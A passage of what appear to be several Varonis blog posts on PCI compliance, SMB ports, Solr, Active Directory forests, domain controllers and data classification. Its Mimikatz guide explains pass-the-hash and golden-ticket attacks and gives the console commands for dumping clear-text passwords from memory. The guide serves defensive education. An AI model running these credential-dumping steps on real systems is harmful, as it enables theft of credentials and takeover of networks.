The other option is to complete the SAQ, which is a series of yes or no questions to determine your level of compliance with the PCI DSS. Each organization performs the SAQ and submits their quarterly reports to their required organizations.

How Do I Maintain My PCI Compliance?

In order to maintain PCI compliance, you must also engage with PCI compliant credit card processors and banks. The data you protect only matters if that data remains protected across the entire transaction life cycle.

First, you need to employ good data security practices inside your organization and have regular internal audits and quality monitoring of your PCI compliant data. Here are some specific controls you can implement that will help protect your PCI data.

maintain PCI compliance

  • Discover and Classify Sensitive Data
    • Locate and secure all sensitive data
    • Classify data based on business policy
  • Map Data and Permissions
    • Identify users, groups, folder and file permissions
    • Determine who has access to what data
  • Manage Access Control
    • Identify and deactivate stale users
    • Manage user and group memberships
    • Remove Global Access Groups
    • Implement a least privilege model
  • Monitor Data, File Activity, and User Behavior
    • Audit and report on file and event activity
    • Monitor for insider threats, malware, misconfigurations and security breaches
    • Detect security vulnerabilities and remediate
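Discovery tooling for cardholder data typically combines pattern matching with a checksum test, since valid card numbers satisfy the Luhn algorithm. Here is a minimal sketch of that check (a generic illustration, not any particular product’s method; real scanners also check issuer prefixes, surrounding context, and false-positive rates):

```python
def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    digits = [int(ch) for ch in number if ch.isdigit()]
    if len(digits) < 13:  # card numbers are 13-19 digits long
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:    # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0
```

A string that matches a card-number pattern but fails the checksum is almost certainly not a real card number, which keeps discovery reports from drowning in noise.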

Penalties for PCI Compliance Violations

According to the primary PCI Compliance Blog, fines are not published or reported, and usually end up passed to the merchants. Banks pass the fines along as increased transaction fees or termination of business relationships.

Fines vary from $5,000 to $100,000 per month until the merchants achieve compliance. That kind of fine is manageable for a big bank, but it could easily put a small business into bankruptcy.

But these fines issued by the card brands are small in comparison to credit monitoring fees, lawsuits, and actions by state and federal governments that can result when you’re not truly PCI DSS compliant. For example, Target said the total cost of its massive breach of credit card data was over $200 million, which included an $18.5 million legal settlement with 47 state attorneys general.

The Varonis Data Security Platform provides the foundation you need to begin your PCI compliance journey. Varonis maps your folders and folder access and scans your files for PCI compliant data. Once you know where your PCI compliance data lives you can work to reduce the risk of breach and then monitor that data for abnormal access patterns. Varonis protects your PCI data for the long term. You can even run data access reports for your PCI compliance audits.

Read more about how Varonis assists you on your compliance journey by downloading our free Compliance and Regulation Guide.

What is an SMB Port + Ports 445 and 139 Explained

smb port hero image

The SMB protocol enables “inter-process communication” between applications and services on networked computers – you might say SMB is one of the languages that computers use to talk to each other.

How Does The SMB Protocol Work?

In early versions of Windows, SMB ran on top of the NetBIOS network architecture. Microsoft changed SMB in Windows 2000 to operate on top of TCP and use a dedicated IP port. Current versions of Windows continue to use that same port.

Microsoft continues to make advancements to SMB for performance and security: SMB2 reduced the overall chattiness of the protocol, while SMB3 included performance enhancements for virtualized environments and support for strong end-to-end encryption.

SMB Protocol Dialects

Just like any language, SMB has different dialects, created for different purposes. For example, the Common Internet File System (CIFS) is a specific implementation of SMB that enables file sharing. Many people mistake CIFS for a different protocol than SMB, when in fact the two share the same basic architecture.

Important SMB implementations include:

  • CIFS: CIFS is a common file sharing protocol used by Windows servers and compatible NAS devices.
  • Samba: Samba is an open-source implementation of SMB and Microsoft Active Directory services that allows non-Windows machines to communicate with a Windows network.
  • NQ: NQ is another portable file sharing SMB implementation developed by Visuality Systems.
  • MoSMB: MoSMB is a proprietary SMB implementation by Ryussi Technologies.
  • Tuxera SMB: Tuxera is also a proprietary SMB implementation that runs in either kernel or user-space.
  • Likewise: Likewise is a multi-protocol, identity-aware network file sharing implementation whose developer was purchased by EMC in 2012.

What Are Ports 139 And 445?

SMB has always been a network file sharing protocol. As such, SMB requires network ports on a computer or server to enable communication to other systems. SMB uses either IP port 139 or 445.

  • Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older session protocol that allows Windows computers to talk to each other on the same network.
  • Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.
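You can check whether a host is actually listening on one of these ports with a simple TCP connect test. This is a quick sketch using only the standard library (the hostname in the comment is hypothetical; a real audit would use a purpose-built scanner such as nmap):

```python
import socket

def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Attempt a TCP connection; True means something is listening."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# e.g. port_is_open("fileserver.local", 445) -- hypothetical hostname
```

Only run checks like this against systems you own or are authorized to test.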

smb port 139 and 445

How To Keep These Ports Secure

Leaving network ports open to enable applications to function is a security risk. So how do we manage to keep our networks secure and maintain application functionality and uptime? Here are some options to secure these two important and well-known ports.

  1. Enable a firewall or endpoint protection to protect these ports from attackers. Most solutions include a blacklist to block connections from known attacker IP addresses.
  2. Install a VPN to encrypt and protect network traffic.
  3. Implement VLANs to isolate internal network traffic.
  4. Use MAC address filtering to keep unknown systems from accessing the network. This tactic requires significant management to keep the list maintained.

how to keep ports 139 and 445 secure

In addition to the network specific protections above, you can implement a data centric security plan to protect your most important resource – the data that lives on your SMB file shares.

Understanding who has access to your sensitive data across your SMB shares is a monumental task. Varonis maps your data and access rights and discovers your sensitive data on your SMB shares. Monitoring your data is essential to detect attacks in progress and protect your data from breaches. Varonis can show you where data is at-risk on your SMB shares and monitor those shares for abnormal access and potential cyberattacks.  Get a 1:1 demo to see how Varonis monitors CIFS on NetApp, EMC, Windows, and Samba shares to keep your data safe.

Varonis Gets Lightning Fast with Solr

Varonis Gets Lightning Fast with Solr

Any security practitioner who has had to perform forensic analysis on a cybersecurity incident likely describes the process as “searching for a needle in a stack of needles.” Even Tony Stark’s magnet isn’t going to help. Anyone who has used a SIEM or any other monitoring system to figure out how gigabytes of data were stolen knows how difficult that task can be.

Varonis leverages Solr to optimize and streamline the process of analyzing data related to a cybersecurity incident. Solr makes the stack of needles smaller – enabling security teams to analyze incidents faster.


How is Varonis using Solr?

The Solr server is a repository for the most current Varonis log and alert data, making searches in the Varonis WebUI lightning fast. The Varonis WebUI presents the searches in a clean and customizable view that you can filter and narrow down to find the correct needle in that stack of needles.

New events and alerts are available in the Varonis WebUI immediately, and Solr indexes the data as it is received. The Varonis WebUI correlates and contextualizes the data into understandable and actionable alerts, which can combine seemingly unrelated events into a clear picture of a coordinated cyberattack.

The new Solr search engine starts providing data while the search is running. The search field has autocomplete, so you can see possible search parameters as you type, just like in Google. You can save searches, set your favorite filters or queries, and easily access them again in the future.

What are the Advantages of Solr?

Solr is an open-source search optimized database that is used throughout the software industry. With the new WebUI powered by Solr, customers are seeing faster alerts, easier forensic analysis, and quicker query return.

Some of the features of Solr that Varonis uses are:

  • Advanced Full-Text Search Capabilities: Solr uses the Lucene search engine to implement powerful and optimized searching and indexing
  • Optimized for High Volume Traffic: Solr has proven its capability to operate at extremely large scales all over the world
  • Easy Monitoring: Solr includes self-monitoring tools via Java Management Extensions (JMX) for system performance and uptime monitoring
  • Highly Scalable and Fault-Tolerant: Solr scales up and down easily depending on your loads and use cases. Rebalancing and fault tolerance are built into Solr out of the box
  • Near Real-Time Indexing: Solr can index and search at the same time
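Under the hood, a Solr search is an HTTP request to a core’s /select handler. As an illustration, here is how a filtered query URL might be built with the standard library – the core name and field names are hypothetical, while q, fq, and rows are standard Solr query parameters:

```python
from urllib.parse import urlencode

def solr_query_url(base, core, query, filters=(), rows=10):
    """Build a Solr /select URL with a query, filter queries, and row limit."""
    params = [("q", query), ("rows", rows)]
    params += [("fq", f) for f in filters]  # fq narrows results without affecting scoring
    return f"{base}/solr/{core}/select?{urlencode(params)}"

url = solr_query_url("http://localhost:8983", "events",
                     "alert_type:exfiltration",
                     filters=["severity:high"], rows=25)
```

Filter queries (fq) are cached independently by Solr, which is one reason saved filters return so quickly on repeated searches.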

The Varonis WebUI is an awesome tool for advanced alerting and investigating cybersecurity incidents. The WebUI is fast and easy to navigate, but the real power is how Varonis analyzes the data and uses advanced threat models to paint an easy to understand picture of cybersecurity attacks.

See the new Varonis WebUI in a free 1:1 Demo – and experience how fast and easy responding to cybersecurity threats with Varonis can be.

What is Mimikatz: The Beginner’s Guide

what is mimikatz hero

Benjamin Delpy originally created Mimikatz as a proof of concept to show Microsoft that their authentication protocols were vulnerable to attack. Instead, he inadvertently created one of the most widely used and downloaded hacker tools of the past 20 years.

Rendition Infosec’s Jake Williams said, “Mimikatz has done more to advance security than any other tool I can think of.” If you’re tasked with protecting Windows networks, it’s essential to keep up with the latest Mimikatz updates to understand the techniques hackers will use to infiltrate your networks – and stay one step ahead.

What is Mimikatz?

Mimikatz is an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.

Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.

mimikatz definition

What Can Mimikatz Do?

Mimikatz originally demonstrated how to exploit a single vulnerability in the Windows authentication system. Now the tool demonstrates several different kinds of vulnerabilities. Mimikatz can perform credential-gathering techniques such as:

  • Pass-the-Hash: Windows stores password data as an NTLM hash. Attackers use Mimikatz to pass that exact hash string to the target computer to log in. Attackers don’t even need to crack the password – they just use the hash string as is. It’s the equivalent of finding the master key to a building on the floor: that one key opens all the doors.
  • Pass-the-Ticket: Newer versions of Windows store password data in a construct called a ticket. Mimikatz provides functionality for a user to pass a Kerberos ticket to another computer and log in with that user’s ticket. It’s basically the same as pass-the-hash otherwise.
  • Over-Pass the Hash (Pass the Key): Yet another flavor of pass-the-hash, but this technique passes a unique key, obtained from a domain controller, to impersonate a user.
  • Kerberos Golden Ticket: This is a pass-the-ticket attack, but with a specific ticket for a hidden account called KRBTGT – the account that encrypts all of the other tickets. A golden ticket gives you domain admin credentials on any computer in the network, and it doesn’t expire.
  • Kerberos Silver Ticket: Another pass-the-ticket attack, but a silver ticket takes advantage of a feature in Windows that makes it easy to use services on the network. Kerberos grants a user a TGS ticket, which the user can present to log into services on the network. Microsoft doesn’t always check a TGS ticket after it’s issued, so it’s easy to slip one past any safeguards.
  • Pass-the-Cache: Finally, an attack that doesn’t take advantage of Windows! A pass-the-cache attack is generally the same as pass-the-ticket, but this one uses the saved and encrypted login data on a Mac/UNIX/Linux system.

what can mimikatz do

Where to Download Mimikatz

You can download Mimikatz from Benjamin Delpy’s GitHub – he offers several options to download, from the executable to the source code. You will need to compile with Visual Studio 2010 or later.

How Do You Use Mimikatz

When you run Mimikatz with the executable, you get a Mimikatz console in interactive mode where you can run commands in real time.

Run Mimikatz as Administrator: Mimikatz needs to be “Run as Admin” to function completely, even if you are using an Administrator account.

Checking Version of Mimikatz

There are 2 versions of Mimikatz: 32bit and 64bit. Make sure you are running the correct version for your installation of Windows. Run the command ‘version’ from the Mimikatz prompt to get information about the Mimikatz executable, the Windows version, and if there are any Windows settings that will prevent Mimikatz from running correctly.

Extracting clear text passwords from memory

The sekurlsa module in Mimikatz lets you dump passwords from memory. To use the commands in the sekurlsa module, you must have Admin or SYSTEM permissions.

First, run the command:

mimikatz # privilege::debug

The output will show if you have appropriate permissions to continue.

Next, start the logging functions so you can refer back to your work.

mimikatz # log nameoflog.log

And finally, output all of the clear text passwords stored on this computer.

mimikatz # sekurlsa::logonpasswords

Using Other Mimikatz modules

The crypto module allows you to access the CryptoAPI in Windows which lets you list and export certificates and their private keys, even if they’re marked as non-exportable.

The kerberos module accesses the Kerberos API so you can play with that functionality by extracting and manipulating Kerberos tickets.

The service module allows you to start, stop, disable, etc. Windows services.

And lastly, the coffee command returns ASCII art of coffee. Because everyone needs coffee.

There is so much more to Mimikatz to explore, whether you are looking at penetration testing or just want to dig into the Windows authentication internals.

Want to see Mimikatz in action and learn how Varonis protects you from infiltration? Join our free Live Cyber Attack Workshop and see our engineers execute a live cyberattack in our security lab.

What is an Active Directory Forest?

What is an Active Directory Forest?

An Active Directory forest (AD forest) is the topmost logical container in an Active Directory configuration, containing domains, users, computers, and group policies.

“But wait?” you say. “I thought Active Directory was just one domain?”

A single Active Directory configuration can contain more than one domain, and we call the tier above the domain the AD forest. Each forest can hold one or more trees of domains, and it can be tough to see the forest for the trees.

This additional top-level layer creates security challenges and increased potential for exploitation, but it can also mean greater isolation and autonomy when necessary: the trick is to understand AD forests and different strategies to protect them.

active directory forest diagram

How to Create a Forest Design?

Say you want to create a forest, or (and more likely) you have inherited a forest that you need to clean up. It’s common to see several different domains and GPOs in one or more forests that try to coexist due to earlier attempts at consolidation or acquisition.

First, determine if there are any organizational requirements that require a completely separate set of security policies. Frame the conversation with a focus on data security:

  • Are there over-arching policies you can set at the AD forest level?
  • Do you need additional domains with different security policies or segregated network connectivity?
  • Are there legal or application requirements that require separate domains in the forest?

Once you have the “autonomy and isolation” requirements documented, the design team can build the forest, domains, and GPOs according to each team or organization’s needs.

How Many Forests are Required?

In some cases, it might be necessary to create separate AD forests based on the autonomy or isolation requirements. Adding additional forests multiplies the complexity to manage the AD schema. There are some considerations to make if you decide to add another forest to your AD schema:

  • Can you achieve sufficient isolation without creating a second forest?
  • Do all of the stakeholders understand the ramifications of separate forests?
    • Management of 2 separate forests means you will have double the application servers and IT costs.
  • Do you have the resources to manage another forest?
    • A single IT team should not manage both AD forests. Security professionals recommend one (1) IT team per forest for segregation of duties.
    • Best practice is to migrate new or acquired domains into a single AD forest.

Single Forest vs Multi-Forest Active Directory Design

A single AD forest is a simpler solution long-term and generally considered best practice. It’s possible to create a secure environment without the additional overhead of a 2nd AD forest with multiple domains by leveraging GPOs, established data owners, and a least privilege model.

Multi-forests do provide an extra layer of security across the two domains, but at a significant increase to IT cost. Multi-forests do not make you more secure by default. You still need to configure GPOs and permissions appropriately for each AD forest.

Forest Design Models

types of active directory forest design models

There are three primary ways to design an AD forest, and you can mix and match those designs to meet your organization’s security needs. Every Active Directory has at least one AD forest, and there are cases where multiple AD forests are required to meet business and security objectives. Here are a few different forest models. Each model has different advantages, disadvantages, and unique use cases.

Organizational Forest Model

In an organizational forest, user accounts and resources are stored and managed together. This is the standard configuration.

Characteristics of an organizational forest model:

  • Provides autonomy to users and resources in the forest
  • Isolates services and data from anyone outside the forest
  • Trust relationships between forests can allow access to some resources that live in outside forests

Resource Forest Model

A resource forest separates user accounts and resources into different forests. You would use this configuration to separate a manufacturing system or mission-critical system from the primary forest, so any problems with one forest allow the other to continue operation.

Characteristics of a Resource Forest Model:

  • Users live in the organizational forest
  • Resources live in one or more additional forests
  • Only alternative administrative user accounts live in the resource forests
  • Trusts enable resource sharing with the users
  • This model provides service isolation, so if one forest goes down the others will continue to operate as normal.

Restricted Access Forest Model

A restricted access forest totally isolates the users and resources in it from other forests. You would use this configuration to completely secure data and limit users to specific datasets.

Characteristics of a Restricted Access Forest Model:

  • No trusts exist to other forests
  • Users from other forests are not able to access resources in the restricted access forest
  • Users need a 2nd computer to access the restricted forest
  • Can be housed on a completely separate network if necessary

Active Directory Forests Best Practices

AD forests have been around since 2000, so there are many different theories about the best way to configure Active Directory and forests. Current best practices include:

  • When possible, consolidate to a single forest
  • Secure resources and data via GPO and apply a least privileged model
  • Use GPOs to further limit users’ ability to create new folders without following a set process, in keeping with the least privileged permissions model.
  • Give your domain admins a 2nd admin account they use only when required per the change management process.
  • If you have multiple AD forests with trust relationships, consider consolidation.
  • If you need to create a restricted access forest, make sure it is truly restricted. As secure as we want the primary forest to be, a restricted access forest should be Castle Black. Put a 700’ wall around it and keep it there.

active directory forest best practices

If Active Directory holds the keys to the kingdom, the AD forest is the keyring for some of those keys: it’s important not only to secure Active Directory, but to understand how to configure and manage the AD forest in order to prevent data breaches and reduce security vulnerabilities.

Want to learn more about how to protect Active Directory – regardless of how many AD forests you have?  Learn about 5 FSMO Roles in Active Directory, and check out the difference between AD for Windows and Azure Active Directory.  Prefer an audio/visual experience instead?  We’ve got you covered: watch an on-demand webinar on 4 Tips to Secure Active Directory.


What is a Domain Controller, When is it Needed + Set Up

domain controller hero image

A domain controller is a server that responds to authentication requests and verifies users on computer networks. Domains are a hierarchical way of organizing users and computers that work together on the same network. The domain controller keeps all of that data organized and secured.

The domain controller (DC) is the box that holds the keys to the kingdom – Active Directory (AD). While attackers have all sorts of tricks to gain elevated access on networks, including attacking the DC itself, you can not only protect your DCs from attackers but actually use DCs to detect cyberattacks in progress.

What is The Main Function of a Domain Controller?

domain controller use

The primary responsibility of the DC is to authenticate and validate user access on the network. When users log into their domain, the DC checks their username, password, and other credentials to either allow or deny access for that user.

Microsoft Active Directory and Microsoft Azure AD are the most common examples, while Samba is the Linux-based equivalent DC.

Why is a Domain Controller Important?

Domain controllers contain the data that determines and validates access to your network, including any group policies and all computer names. Everything an attacker could possibly need to cause massive damage to your data and network is on the DC, which makes a DC a primary target during a cyberattack.

Domain Controller vs. Active Directory


Active Directory is a type of domain, and a domain controller is an important server on that domain – kind of like how there are many types of cars, and every car needs an engine to operate. Every domain has a domain controller, but not every domain is Active Directory.

Do I Need a Domain Controller?

In general, yes. Any business – no matter the size – that saves customer data on its network needs a domain controller to improve the security of that network. There could be exceptions: some businesses, for instance, only use cloud-based CRM and payment solutions. In those cases, the cloud service secures and protects customer data.

The key question you need to ask is “where does my customer data live and who can access it?”

The answer determines if you need a domain – and DC – to secure your data.

domain controller benefits and limitations

Benefits of Domain Controller

  • Centralized user management
  • Enables resource sharing for files and printers
  • Federated configuration for redundancy (FSMO)
  • Can be distributed and replicated across large networks
  • Encryption of user data
  • Can be hardened and locked-down for improved security

Limitations of Domain Controller

  • Target for cyberattack
  • Potential to be hacked
  • Users and OS must be maintained to be stable, secure, and up-to-date
  • Network is dependent on DC uptime
  • Hardware/software requirements

How to Set Up a Domain Controller + Best Practices

best practices for setting up a domain controller

  • Configure a stand-alone server for your domain controller.
    • If you are using Azure AD as your domain controller, you can skip this step.
    • If not, your DC should act exclusively as a DC.
  • Limit both physical and remote access to your DC as much as possible.
    • Consider local disk encryption (BitLocker)
    • Use GPOs to provide access to the SysAdmins in charge of administering Active Directory, and allow no other users to log in, either on the console or via Terminal Services.
  • Standardize your DC configuration for reuse

Setting up a secure and stable DC doesn’t mean you are secure forever. Attackers will still try to hack into your DC to escalate privileges or enable lateral movement throughout your network. Varonis monitors AD for out-of-policy GPO changes, Kerberos attacks, privilege escalations, and more.

Want to see how it works? Get a personalized 1:1 demo to see how Varonis protects DCs and Active Directory from cyberattacks.

What is Data Classification? Guidelines and Process

data classification title

In order to protect your sensitive data, you have to know what it is and where it lives.

Data Classification Defined

Data classification is the process of analyzing structured or unstructured data and organizing it into categories based on the file type and contents.

Data classification is a process of searching files for specific strings of data – for example, finding all references to “Szechuan Sauce” on your network, locating everywhere HIPAA-protected data lives, or identifying any personally identifiable information (PII) on your data stores to prepare for data privacy regulations.

definition of data classification

Data classification is usually based on a file parser combined with a string analysis system. A file parser allows the data classification engine to read the contents of several different types of files. A string analysis system then matches data in the files to defined search parameters.

RegEx – short for regular expression – is one of the more common string analysis systems that define specifics about search patterns. For example, if I wanted to find all VISA credit card numbers in my data, the RegEx would look like:

\b(?<![:$._'-])(4\d{3}[ -]\d{4}[ -]\d{4}[ -]\d{4}\b|4\d{12}(?:\d{3})?)\b

That sequence tells the RegEx system that we are looking for a pattern with a 4-digit number starting with the number 4, followed by a space or dash, then a second 4-digit number and… you get the idea. Only a string of characters that matches the RegEx exactly generates a positive result.
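As a quick sketch of how that pattern behaves, here it is in Python’s re module (the card numbers below are standard test values, not real accounts, and the helper name is my own):

```python
import re

# The VISA pattern from above; the negative lookbehind rejects matches
# immediately preceded by any of : $ . _ ' or -
VISA_RE = re.compile(
    r"\b(?<![:$._'-])(4\d{3}[ -]\d{4}[ -]\d{4}[ -]\d{4}\b|4\d{12}(?:\d{3})?)\b"
)

def find_visa_numbers(text):
    """Return every substring of text that matches the VISA pattern."""
    return [m.group(1) for m in VISA_RE.finditer(text)]
```

The first alternative catches separator-formatted numbers like 4111-1111-1111-1111; the second catches unbroken 13- or 16-digit runs starting with 4.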

Although there are some parallels between the two, data classification is not the same as data indexing. Classification looks for identifiers based on patterns and returns a list of files and how many matches it found for each pattern. It doesn’t necessarily index those files. Indexing enables search, and you’ll need to search those matches to fulfill data subject access requests and right-to-be-forgotten requests.
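To illustrate the distinction with a toy sketch (not how any particular product works internally): classification returns match counts per file for a pattern, while an index maps each term back to the files containing it so those files can be searched later.

```python
import re

# Two in-memory "files" standing in for documents on a share
DOCS = {
    "a.txt": "Szechuan Sauce recipe, top secret",
    "b.txt": "lunch order: Szechuan Sauce x2",
}

# Classification: how many hits per file for one pattern
pattern = re.compile(r"Szechuan Sauce")
counts = {name: len(pattern.findall(text)) for name, text in DOCS.items()}

# Indexing: which files contain each term, enabling later search
index = {}
for name, text in DOCS.items():
    for term in set(re.findall(r"\w+", text.lower())):
        index.setdefault(term, set()).add(name)
```

With the index in hand, a data subject access request becomes a lookup (`index["szechuan"]`) rather than a re-scan of every file.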

Reasons for Data Classification

reasons to implement data classification

The Center for Internet Security (CIS) – which devotes an entire section to data classification protections – says data classification is important because “in several high-profile breaches over the past two years, attackers were able to gain access to sensitive data stored on the same servers with the same level of access as far less important data.”

Beyond data security concerns, there are several other reasons to implement a data classification process:

  • Identify sensitive files, intellectual property, and trade secrets
  • Secure (and lock down) critical data
  • Track regulated data to comply with regulations like HIPAA, PCI, or GDPR
  • Optimize search capabilities with data indexing
  • Discover statistically significant patterns or trends inside data
  • Optimize storage by identifying duplicate or stale data

Data Classification Process: 4 Steps

Data classification processes differ slightly depending on the objectives for the project. Any data classification project requires automation to process the astonishing amount of data that companies create every day. In general, there are some ubiquitous criteria required to create any data classification process:

  1. Define the objectives of the data classification process. What are you looking for? Why?
  2. Create workflows based on the selected classification tools. How does the classification process work? Is there a process in place to scan new data? Is there a process to create new classification criteria?
  3. Define the categories and classification criteria. What kinds of data should you search for? What process will you follow to validate the classification results?
  4. Define outcomes and usage of classified data. How are the results organized – and how do you plan to make business decisions based on those results?
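The four steps above can be sketched in miniature (the categories and patterns are illustrative assumptions, not a production taxonomy): the objective is to find SSN- and email-like strings, the workflow is a recursive scan, the criteria are RegEx patterns, and the outcome is a per-file match count.

```python
import re
from pathlib import Path

# Step 3: illustrative categories and classification criteria
CATEGORIES = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
}

def classify_file(path):
    """Count matches per category in a single file."""
    text = Path(path).read_text(errors="ignore")
    return {name: len(rx.findall(text)) for name, rx in CATEGORIES.items()}

def classify_tree(root):
    """Step 2 workflow: scan a directory tree, keep files with any match."""
    report = {}
    for p in Path(root).rglob("*.txt"):
        counts = classify_file(p)
        if any(counts.values()):
            report[str(p)] = counts
    return report
```

Step 4 is then a business decision: the report of flagged files can feed permission reviews, retention policies, or compliance audits.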

Data Classification Tips

  • Use automated tools to process large volumes of data quickly
  • Leverage RegExes and Luhn checks: create custom classification patterns or implement software that does the heavy lifting for you
  • Validate your classification results: nobody likes a false positive.
  • Figure out how to best use your results and apply classification to everything from data security to business intelligence.
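The Luhn check mentioned above is the standard checksum for weeding out false-positive card numbers; a minimal implementation looks like this (the function name is my own):

```python
def luhn_valid(candidate: str) -> bool:
    """Return True if the digits in candidate pass the Luhn checksum."""
    digits = [int(c) for c in candidate if c.isdigit()]
    total = 0
    # Walk right to left, doubling every second digit
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9  # equivalent to summing the two digits of d
        total += d
    return len(digits) > 1 and total % 10 == 0
```

A RegEx hit like 4111-1111-1111-1111 passes the checksum, while a one-digit typo fails it, so pairing pattern matching with the checksum cuts false positives considerably.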

Data Classification FAQ

How does Varonis do Data Classification differently?

Varonis has over 400 pre-configured RegExes to discover all manner of PII, PHI, and GDPR data with a fully customizable classification engine you can configure for any business purpose. Varonis monitors over 60 file types out of the box (including documents, spreadsheets, and more) and identifies new data that needs to be re-scanned (without restarting the whole process) to catch new and recently added sensitive files, including:

  • Personal information: credit card numbers, passport numbers, driver’s license numbers, social security numbers, IBAN, and more
  • Financial records
  • Security file types (.cer, .crt, .p7b, etc.)
  • Regulated data (GDPR, HIPAA, PII, PHI, PCI, Sarbanes Oxley, GLBA, etc.)

The Varonis Data Classification Engine can process roughly 100 GB of data per hour (depending on your hardware and network capacity) and includes rigorous false positive checks that reduce the work needed to analyze the classification results. Not every 16-digit numeric string is a credit card number, for instance, and Varonis knows the difference.

What Comes After Data Classification?

Varonis brings context to that classification. Varonis not only identifies the data that you’re looking for, but shows you who can access that data – and who is accessing it. Once you identify and classify sensitive data, you can take action on it: apply labels, lock down permissions, monitor access, alert on suspicious activity, and meet compliance requirements like right-to-be-forgotten. The Varonis Data Classification Engine allows you to protect your most sensitive and important data from unwanted access, accidental data leaks, and security attacks.

See the Data Classification Engine in action with a 1:1 demo.